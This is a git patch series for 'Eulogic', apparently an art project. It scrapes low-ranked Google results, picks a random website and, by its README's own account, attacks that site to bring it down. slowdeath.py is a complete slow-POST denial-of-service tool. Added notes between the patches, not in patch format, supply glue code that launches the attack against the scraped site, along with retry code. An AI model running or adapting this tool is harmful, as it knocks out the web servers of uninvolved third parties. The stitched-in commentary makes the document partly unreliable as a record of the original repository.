From 83430f03d921463840bdc031a460117fc71feb83 Mon Sep 17 00:00:00 2001
From: AK
Date: Thu, 26 Apr 2012 15:58:05 -0400
Subject: [PATCH 1/3] added search.py and slowdeath.py

---
 search.py    | 93 +++++++++++++++++++++++++++++++++++++++++++++++++
 slowdeath.py | 97 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 190 insertions(+)
 create mode 100644 search.py
 create mode 100755 slowdeath.py

diff --git a/search.py b/search.py
new file mode 100644
index 0000000..cf73da4
--- /dev/null
+++ b/search.py
@@ -0,0 +1,93 @@
+import urllib2
+import simplejson
+import re
+import requests
+from bs4 import BeautifulSoup
+from random import choice
+
+
+ #function to use if we want to control size of string
+# from bs4 import SoupStrainer
+#
+# only_a_tags = SoupStrainer("a")
+#
+# only_tags_with_id_link2 = SoupStrainer(id="link2")
+#
+# def is_short_string(string):
+# return len(string) < 10
+#
+# only_short_strings = SoupStrainer(text=is_short_string)
+
+
+ # The request also includes the userip parameter which provides the end
+ # user's IP address. Doing so will help distinguish this legitimate
+ # server-side traffic from traffic which doesn't come from an end-user.
+
+
+
+id = "hotdog"  # dynamic id from the site, passed in a POST request
+url = ('https://ajax.googleapis.com/ajax/services/search/web'
+       '?v=1.0&q=' + id + '&userip=USERS-IP-ADDRESS')
+
+request = urllib2.Request(url, None, {'Referer': "www.google.com"})
+response = urllib2.urlopen(request)  # open the url
+
+ # Process the JSON string.
+results = simplejson.load(response)
+results = results["responseData"]
+results = results['cursor']
+nofResults = (results["resultCount"])
+ # set a variable for search result pagination
+nom = long(nofResults.replace(",", ""))/ 10000
+
+print "Results searched....", nom
+results = results["moreResultsUrl"]
+#print results
+
+ #results = results['resultCount']
+
+ #regex to add the page offset to the results url
+split = re.split("start=0", results)
+newurl = split[0] + "start=" + str(nom) + split[1]
+print "found!!! " + newurl
+
+r = requests.get(newurl)
+ # print r.status_code
+ # print r.headers['content-type']
+
+r = r.text
+soup = BeautifulSoup(r)
+all = []
+for link in soup.find_all("a"):
+    all.append(link.get("href"))
+listOfUrls = []
+
+for s in all:  # iterate through the document and extract links
+    if s and re.findall(r"/url\?", s):  # escape the ? and guard against href=None
+
+        split1 = re.split("&", s)
+        split2 = re.split("=", split1[0])
+        deathlinks = []
+        sp = split2[1].split("//n")
+        #print sp[0]
+
+        # list of lists
+        listOfUrls.append(sp[0])
+
+ #random url selected
+deathUrl = choice(listOfUrls)
+ #printing the selected url
+print "I am chosen to die!" + deathUrl
+
+ #open urls and parse
+death = urllib2.urlopen(deathUrl)
+death = death.read()
+deathSoup = BeautifulSoup(death)
+print deathSoup.get_text()
+ # a different HTML parse function using stripped strings to remove white space
+
+ # for string in deathSoup.stripped_strings:
+ # #context free variable from site
+ # tocontextfree = (string)
+ # print tocontextfree
\ No newline at end of file
diff --git a/slowdeath.py b/slowdeath.py
new file mode 100755
index 0000000..696c02d
--- /dev/null
+++ b/slowdeath.py
@@ -0,0 +1,97 @@
+#!/usr/bin/env python
+
+from optparse import OptionParser
+from urlparse import urlparse
+from time import sleep
+import socket
+import threading
+
+def openConnections(url, threads, sleepTime):
+    urlParts = urlparse(url)
+    if urlParts.scheme != 'http':
+        raise Exception('Only the http protocol is currently supported')
+
+    port = urlParts.port
+
+    if port is None: port = 80
+
+    print "Opening %d sockets to %s:%d" % (threads, urlParts.hostname, port)
+
+    pool = []
+
+    try:
+        for i in range(threads):  # range(1, threads) would start one worker too few
+            t = Worker(urlParts.hostname, port, urlParts.path, sleepTime)
+            pool.append(t)
+            t.start()
+
+        print "Started %d threads. Hit ctrl-c to exit" % (threads)
+
+        while True: sleep(1)
+
+    except KeyboardInterrupt:
+        print "\nCaught keyboard interrupt. Stopping all threads"
+
+    for worker in pool: worker.stop()
+
+    for worker in pool: worker.join()
+
+class Worker(threading.Thread):
+    def __init__(self, host, port, path, sleepTime):
+        self.host = host
+        self.port = port
+        self.path = path
+        self.sleepTime = sleepTime
+        self.stopped = False
+        threading.Thread.__init__(self)
+
+    def stop(self): self.stopped = True
+
+    def run(self):
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((self.host, self.port))
+        s.settimeout(1)
+        # Send the headers of a POST that claims a huge body, then trickle
+        # the body out slowly so the server keeps the connection open.
+        s.send(
+            'POST ' + self.path + ' HTTP/1.1\r\n' +
+            'Host: ' + self.host + '\r\n' +
+            'Connection: close\r\n' +
+            'Content-Length: 1000000\r\n' +
+            '\r\n'
+        )
+
+        while not self.stopped:
+            s.send('abc=123&')
+            sleep(self.sleepTime / 1000.0)  # sleepTime is in milliseconds
+
+        s.close()
+
+def main():
+    parser = OptionParser(
+        version="slowdeath v0.1",
+        description="Kills web servers by keeping many connections open and avoiding timeouts.",
+        usage="usage: %prog [options] url",
+    )
+    parser.add_option(
+        '-t', '--threads',
+        help="Number of connections to keep open (default = 100)",
+        type="int",
+        dest="threads",
+        default=100
+    )
+    parser.add_option(
+        '-s', '--sleep',
+        help="Time between packets in milliseconds (default = 1000)",
+        type="int",
+        dest="sleepTime",
+        default=1000
+    )
+
+    options, args = parser.parse_args()
+
+    if len(args) < 1: parser.error("This utility requires at least 1 argument")
+
+    url = args[0]
+
+    openConnections(url, options.threads, options.sleepTime)
+
+if __name__ == '__main__': main()
\ No newline at end of file

From 344a01f6c2d0f94b5227943b982050bdf7186940 Mon Sep 17 00:00:00 2001
From: AK
Date: Thu, 26 Apr 2012 16:01:02 -0400
Subject: [PATCH 2/3] added readme

---
 README | 4 ++++
 1 file changed, 4 insertions(+)
 create mode 100644 README

diff --git a/README b/README
new file mode 100644
index 0000000..d01d767
--- /dev/null
+++ b/README
@@ -0,0 +1,4 @@
+Eulogic scrapes Google, returns the least relevant results, takes one at random, scrapes its text, then attacks the site to bring it down, and delivers the site's content as a eulogy.
+
+Alexandar Kozovski
+Johann Diedrick
\ No newline at end of file
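
A note on the flow the README describes: in this series the two halves stay separate. search.py picks and scrapes a low-relevance page, slowdeath.py ties up a server, and nothing wires them together yet. The sketch below shows one rough way that glue could look; it is an illustration only, not part of the patches. eulogize() and the example target URL are invented for the sketch, and the chosen URL is assumed to be passed in by hand; openConnections() is the real function added in slowdeath.py above.

# eulogy_sketch.py -- hypothetical glue for the flow the README describes.
# Not part of this patch series. The chosen URL is assumed to be passed in
# by hand; openConnections() is the real function defined in slowdeath.py.
import threading
import urllib2
from time import sleep

from bs4 import BeautifulSoup

from slowdeath import openConnections


def eulogize(death_url, threads=100, sleep_ms=1000):
    # Scrape the page text first, so there is something to read out
    # even if the site stops answering once the attack starts.
    page = urllib2.urlopen(death_url).read()
    eulogy = BeautifulSoup(page).get_text()

    # openConnections() blocks until interrupted, so run it in a
    # background daemon thread; it dies when the eulogy is finished.
    attack = threading.Thread(target=openConnections,
                              args=(death_url, threads, sleep_ms))
    attack.daemon = True
    attack.start()

    # Read the eulogy out line by line while the connections pile up.
    for line in eulogy.splitlines():
        if line.strip():
            print line
            sleep(1)


if __name__ == '__main__':
    eulogize('http://example.com/')  # placeholder target, for illustration only

Running openConnections() in a daemon thread keeps the blocking, ctrl-c driven design of slowdeath.py untouched while the eulogy is read out.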
From c37b90ca479f0136124cb9579f0083541586d978 Mon Sep 17 00:00:00 2001
From: AK
Date: Thu, 26 Apr 2012 23:46:04 -0400
Subject: [PATCH 3/3] Added error catching

---
 search.py | 76 ++++++++++++++++++++++++++++++++++---------------------
 1 file changed, 47 insertions(+), 29 deletions(-)

diff --git a/search.py b/search.py
index cf73da4..1fa2700 100644
--- a/search.py
+++ b/search.py
@@ -4,24 +4,23 @@
 import requests
 from bs4 import BeautifulSoup
 from random import choice
 
-
+# Take a variable, search Google, find the lowest-ranked results, pick one at random, and scrape and print its text
  #function to use if we want to control size of string
-# from bs4 import SoupStrainer
-#
-# only_a_tags = SoupStrainer("a")
-#
-# only_tags_with_id_link2 = SoupStrainer(id="link2")
-#
-# def is_short_string(string):
-# return len(string) < 10
-#
-# only_short_strings = SoupStrainer(text=is_short_string)
+    # from bs4 import SoupStrainer
+    # only_a_tags = SoupStrainer("a")
+    #
+    # only_tags_with_id_link2 = SoupStrainer(id="link2")
+    #
+    # def is_short_string(string):
+    # return len(string) < 10
+    #
+    # only_short_strings = SoupStrainer(text=is_short_string)
 
 
- # The request also includes the userip parameter which provides the end
- # user's IP address. Doing so will help distinguish this legitimate
- # server-side traffic from traffic which doesn't come from an end-user.
+    # The request also includes the userip parameter which provides the end
+    # user's IP address. Doing so will help distinguish this legitimate
+    # server-side traffic from traffic which doesn't come from an end-user.
 
 
 
@@ -38,7 +37,11 @@
 results = results['cursor']
 nofResults = (results["resultCount"])
  # set a variable for search result pagination
-nom = long(nofResults.replace(",", ""))/ 10000
+nom = long(nofResults.replace(",", ""))/10000
+# if nom >= 100000:
+# nom = nom/10000
+# elif nom < 100000:
+# nom = nom/10000
 
 print "Results searched....", nom
 results = results["moreResultsUrl"]
@@ -74,20 +77,35 @@
         # list of lists
         listOfUrls.append(sp[0])
 
- #random url selected
-deathUrl = choice(listOfUrls)
- #printing the selected url
-print "I am chosen to die!" + deathUrl
-
- #open urls and parse
-death = urllib2.urlopen(deathUrl)
-death = death.read()
-deathSoup = BeautifulSoup(death)
-print deathSoup.get_text()
+def myloop(listOfUrls):
+    deathUrl = choice(listOfUrls)
+    listOfUrls.remove(deathUrl)
+    if len(listOfUrls) > 0:
+        #printing the selected url
+        print "Dying! " + deathUrl
+        # for url in deathUrl:  #open urls and parse
+        try:  # urlopen inside the try so HTTP errors are caught as well
+            death = urllib2.urlopen(deathUrl)
+            death = death.read()
+            deathSoup = BeautifulSoup(death)
+            #print (deathSoup.get_text())
+            for string in deathSoup.stripped_strings:
+                tocontextfree = repr(string)
+                print tocontextfree
+
+        except Exception:  # covers urllib2.HTTPError, urllib2.URLError, parser errors, ...
+            # deathUrl = choice(listOfUrls)
+            print "I love errors"
+            print deathUrl
+            return myloop(listOfUrls)
+
+print 'end'
+
+myloop(listOfUrls)
+
+# print (deathSoup.get_text())
  # a different HTML parse function using stripped strings to remove white space
 
- # for string in deathSoup.stripped_strings:
- # #context free variable from site
- # tocontextfree = (string)
- # print tocontextfree
\ No newline at end of file
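
A note on the error catching added in this last patch: myloop() retries by calling itself from the except block, so a long run of dead links costs one stack frame per failure and can eventually hit Python's recursion limit. The sketch below is a non-recursive version of the same keep-trying-until-one-parses idea; it is an illustration only, not part of the series, and read_one() is an invented name.

# retry_sketch.py -- iterative take on the retry-on-error idea in patch 3.
# Not part of this patch series; read_one() is an invented name.
import urllib2
from random import choice

from bs4 import BeautifulSoup


def read_one(listOfUrls):
    # Keep drawing random URLs until one can be fetched and parsed,
    # or the list runs out. No recursion, so a long run of dead links
    # cannot exhaust the stack.
    while listOfUrls:
        deathUrl = choice(listOfUrls)
        listOfUrls.remove(deathUrl)
        try:
            death = urllib2.urlopen(deathUrl).read()
            deathSoup = BeautifulSoup(death)
            for string in deathSoup.stripped_strings:
                print repr(string)
            return deathUrl  # first URL that parsed and printed cleanly
        except Exception:  # urllib2.HTTPError, urllib2.URLError, parser errors, ...
            print "I love errors"
            print deathUrl
    return None  # every candidate failed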